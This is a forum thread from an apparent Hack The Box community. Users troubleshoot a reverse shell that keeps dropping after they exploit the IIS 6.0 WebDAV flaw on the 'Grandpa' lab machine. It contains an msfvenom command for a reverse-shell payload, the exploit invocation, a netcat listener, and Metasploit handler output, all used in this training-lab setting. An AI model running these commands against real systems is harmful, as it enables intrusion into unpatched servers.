Grandpa reverse TCP immediately closes after sending exploit

HTB Content Machines
,
1

Hey Guys,

I am trying to pop Grandpa without Metasploit. For this, I want to use explodingcan as it seems the most straight-forward.

However, when I am sending my payload, I get a connection which immediately disappears again.

msfvenom -p windows/shell_reverse_tcp -f raw -v -sc -e x86/alpha_mixed LHOST=10.10.x.x LPORT=1337 EXITFUNC-thread -o shellcode

root@kali:~# python explodingcan.py http://10.10.10.14 shellcode 
[*] Using URL: http://10.10.10.14
[*] Server found: Microsoft-IIS/6.0
[*] Found IIS path size: 18
[*] Default IIS path: C:\Inetpub\wwwroot
[*] WebDAV request: OK
[*] Payload len: 2187
[*] Sending payload...

root@kali:~# nc -lvnp 1337
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.14.
Ncat: Connection from 10.10.10.14:1053.

I also tried setting up a staged payload instead and handling it with the multi/handler in Metasploit. However, the problem persists.

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.x.x:1032 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.14
[*] Command shell session 1 opened (10.10.x.x:1032 -> 10.10.10.14:1034) at 2019-07-08 20:53:21 +0200


[*] 10.10.10.14 - Command shell session 1 closed.  Reason: User exit
2

@DidgeriDude - you ever find a solution to this? Running into the same thing with about 3 different variants of the exploit. The only thing that seems to be stable is meterpreter.

3

@initinfosec I don’t think I ever solved this mystery. Let me know if you find anything.

4

@DidgeriDude - I found one that works for Granny, using a windows/shell_reverse_tcp stageless listener - haven’t tried it on grandpa yet, but will soon. Shell is super stable. Some of the instability of the shell may just be the Grandpa box:

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/l